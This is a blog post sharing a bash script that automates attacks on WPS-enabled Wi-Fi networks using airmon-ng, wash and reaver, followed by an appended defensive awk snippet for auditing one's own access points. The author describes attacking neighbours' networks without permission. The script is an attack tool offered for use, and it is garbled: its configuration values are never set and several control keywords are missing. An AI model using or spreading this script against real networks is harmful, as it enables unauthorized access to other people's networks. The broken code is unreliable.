Shell script to attack a WPA/WPA2 network [Based on reaver and aircrack-ng]

I’ve spent the past few days playing around with the command line, and that is not something I do very often. It all began when I discovered this handy tool called Reaver which exploits vulnerabilities of the WPS standard. Naturally, I had to test it out on the numerous WPS-enabled wireless networks around me: I must say I have very, err, co-operative [and oblivious] neighbours!

I had previously tried in vain to learn to use the aircrack-ng suite of WiFi hacking tools. Since reaver is based on aircrack-ng, I had no choice but to give it another shot. This time, however, things made more sense, and I managed to use reaver successfully.

I made a small configurable shell script that will hopefully make the command line options seem a little less intimidating to the newcomer.

It’s the first shell script I’ve posted on the Internet, so it’s bound to be inefficient and just plain wrong in many ways, but if you leave a comment, I will definitely pay attention and tweak it. I also plan to include results from airodump-ng which provides a very neat set of information about access point power and frequency of beacons, which can help in choosing the best of the available access points.

#! /bin/bash

#WiFi Attack Script, v1.0
#Author: Vinay Gopinath
#Date: 26 October, 2012

#CONFIG: Customize the script according to your needs
#The default wireless interface (usually wlan0, wifi0 or ath0)

#The timeout (in seconds) for wash to search for WPS-enabled access points

#Flag to allow user to choose target AP

#Delay between attack attempts

#Check for root privileges
if (( EUID != 0 )); then
  echo "This script needs root"
  exit 1

#Check for required commands
for command in airmon-ng wash reaver
  if [[ -z $(which $command) ]]; then
     echo "$command was not found"
     echo "To install $command, you may follow this link"
     echo "$command+installation"
     exit 1

echo "WARNING: Network connections are about to go down. You may need to re-enable wireless connections manually"

#Check available interfaces and close previous monitor interfaces and wireless lan
for interface in $(ifconfig | tr -s [:space:] | cut -f1 -d" " | tr -s [:space:])
  if [[ -n $(echo $interface | grep "^mon*") ]] || [[ -n $(echo $interface | grep '0$') ]] && [[ $(echo $interface) != "eth0" ]]; then
    echo "* Shutting down $interface"
    airmon-ng stop $interface > /dev/null

echo "* Starting a new monitor interface mon0"
airmon-ng start $wireless_interface > /dev/null

echo "Identifying WPS-enabled access points"
timeout $wash_timeout wash -i mon0 --ignore-fcs > washOutput.txt
APs=$(cat washOutput.txt | tail -n +3 | tr -s ' ' | cut -f6 -d' ')

if [[ -n $(echo $APs) ]]; then
   if  (( $allow_user_choice )); then
      echo "The following access points were detected"
      for ap in $APs
        echo "* $n: $ap"
      read -p "Enter your choice: " choice
      if [[ $choice -le $n ]]; then
        chosen_ap=$(echo "${APs}" | head -$choice | tail -1)
	echo "You have chosen $chosen_ap"
	echo "Invalid choice!"
	exit 1
      chosen_ap=$(echo "${APs}" | head -n1)
      echo "Proceeding with choice 1: $chosen_ap"
   tempLine=$(cat washOutput.txt | grep $chosen_ap | tr -s ' ')
   rm washOutput.txt
   channel=$(echo $tempLine | cut -f2 -d' ')
   mac_address=$(echo $tempLine | cut -f1 -d' ')
   echo "Starting reaver"
   echo "reaver -a -S -vv -c $channel -i mon0 -b $mac_address -d $reaver_delay"
   echo "AP name: $chosen_ap"
   echo "Channel: $channel"
   echo "MAC Address: $mac_address"
   reaver -a -S -vv -c $channel -i mon0 -b $mac_address -d $reaver_delay
   echo "No networks found. Consider increasing the wash timeout. Terminating"
   exit 1

This shell script is also available here
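
For the defensive side of the same scan, the following added example (not part of the original post or script) filters saved wash output down to the access points you administer and reports which of them still advertise WPS. Unlike the script's cut -f6, it keeps ESSIDs that contain spaces intact. Assumptions: the six-column wash layout is inferred from the fields the script cuts on, and the function names, BSSIDs and ESSIDs are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original post): report which of YOUR OWN access
# points still advertise WPS, from saved wash output read on stdin.
# Assumed column layout, inferred from the fields the script above cuts on:
#   BSSID  Channel  RSSI  WPS-Version  WPS-Locked  ESSID
# Usage: wps_audit OWN_BSSID... < washOutput.txt

wps_audit() {
  awk -v inv="$*" '
    BEGIN {
      n = split(inv, a, " ")
      for (i = 1; i <= n; i++) own[toupper(a[i])] = 1
    }
    {
      bssid = toupper($1)
      if (!(bssid in own) || NF < 5) next   # skips headers and APs not in the inventory
      essid = (NF >= 6) ? $6 : "<hidden>"
      for (i = 7; i <= NF; i++) essid = essid " " $i   # ESSID may contain spaces
      state = (tolower($5) == "yes") ? "locked" : "unlocked"
      printf "WPS-ENABLED %s ch=%s %s essid=\"%s\"\n", bssid, $2, state, essid
    }'
}

# Constructed sample input; BSSIDs and names are made up.
sample_wash_output() {
  cat <<'EOF'
BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------
02:00:00:AA:BB:01       1            -48        1.0               No                Office Guest WiFi
02:00:00:AA:BB:02       6            -61        1.0               Yes               lab-ap
02:00:00:CC:DD:03      11            -70        1.0               No                SomeoneElse
EOF
}

# Inventory given in lower case on purpose: matching is case-insensitive.
sample_wash_output | wps_audit 02:00:00:aa:bb:01 02:00:00:aa:bb:02
```

Any line it prints is an access point in your inventory with WPS still switched on; an empty result means none of the listed BSSIDs appeared in the scan with WPS advertised.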

